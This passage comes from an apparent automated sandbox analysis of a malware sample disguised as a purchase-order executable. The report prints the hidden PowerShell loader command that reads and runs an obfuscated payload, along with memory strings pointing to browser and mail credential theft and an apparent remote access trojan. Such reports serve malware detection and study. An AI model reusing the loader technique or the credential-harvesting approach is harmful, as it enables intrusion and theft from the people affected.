page */ schema TEXT HIDDEN /* Database schema being analyzed */);
          Source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
          Source: wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834430369.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1835130257.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834669007.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834350157.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834283107.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489990335.0000000021764000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834350157.0000000004F4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
          Source: wab.exe, 0000000D.00000003.1809865015.0000000004F53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
          Source: PO2737478834ORDER.exeReversingLabs: Detection: 13%
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeFile read: C:\Users\user\Desktop\PO2737478834ORDER.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\PO2737478834ORDER.exe "C:\Users\user\Desktop\PO2737478834ORDER.exe"
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Akteret=Get-Content 'C:\Users\user\AppData\Roaming\Grydeskeen146\sdfdsf\Kejsertankens\Habitters.Hej';$Engraphy=$Akteret.SubString(54172,3);.$Engraphy($Akteret)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: dwmapi.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: oleacc.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: shfolder.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: riched20.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: usp10.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: msls31.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: samcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: devenum.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: devobj.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msdmo.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: avicap32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msvfw32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: version.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: vcruntime140.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wsock32.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\PO2737478834ORDER.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
          Source: C:\Program Files (x86)\Windows Mail\wab.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: PO2737478834ORDER.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1773990264.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: vcruntime140.i386.pdb source: wab.exe, wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843060413.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2474505167.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817986100.00000000211A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1844980567.0000000004F78000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1818846526.00000000210A7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817480011.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2491846197.000000006D57F000.00000002.00000001.01000000.0000000E.sdmp, wab.exe, 0000000D.00000003.1817722969.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1817541628.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845212265.0000000004F78000.00000004.00000020.00020000
          Source: Binary string: vcruntime140.i386.pdbGCTL source: wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843060413.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp140.i386.pdbGCTL source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819499640.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819411927.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822535372.00000000218F2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1826399814.00000000219A9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830299143.0000000021A5E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819552866.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819084006.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1830796222.000000002176E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1820465742.00000000217F4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827042574.000000002176B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1834778338.0000000021AF9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1827818589.00000000218AF000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1822981279.0000000021769000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1824994886.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1825691579.0000000021882000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1832273738.0000000021AB8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842736291.0000000021BBF000.00000
          Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000002.00000002.1767627861.0000000003484000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: wab.exe, 0000000D.00000003.1784170585.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1784248802.0000000004F53000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: wab.exe, 0000000D.00000003.1784170585.0000000004F49000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1784248802.0000000004F53000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\Tim\documents\visual studio 2010\Projects\sqlite\Release\sqlite3.pdb source: wab.exe, wab.exe, 0000000D.00000003.1809268507.0000000021151000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809569316.0000000004F5B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489782030.0000000021509000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809482259.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809515216.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489600297.000000002135E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809717244.0000000021475000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1809608585.0000000021051000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2489686837.00000000213E7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: z:\task_1538344561\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: wab.exe, 0000000D.00000003.1842558581.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1845335463.000000002105E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2492433335.000000006ED8D000.00000002.00000001.01000000.0000000D.sdmp, wab.exe, 0000000D.00000003.1842212041.0000000004F5C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843170778.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1847836407.0000000021C0C000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1842323344.0000000004F6A000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: msvcp140.i386.pdb source: wab.exe, 0000000D.00000003.1822159646.0000000021827000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819499640.0000000004F4D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829779268.00000000218DC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1843873786.000000002176A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1823574364.0000000021858000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819951365.0000000021760000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1828488173.0000000021A0E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1841474181.0000000021986000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1819411927.0000000004F6B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1829028087.000000002176F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1831810121.0000000021905000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1838080144.0000000021959000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.1821011460.0000000021891000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2490213793.00000000219B2000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 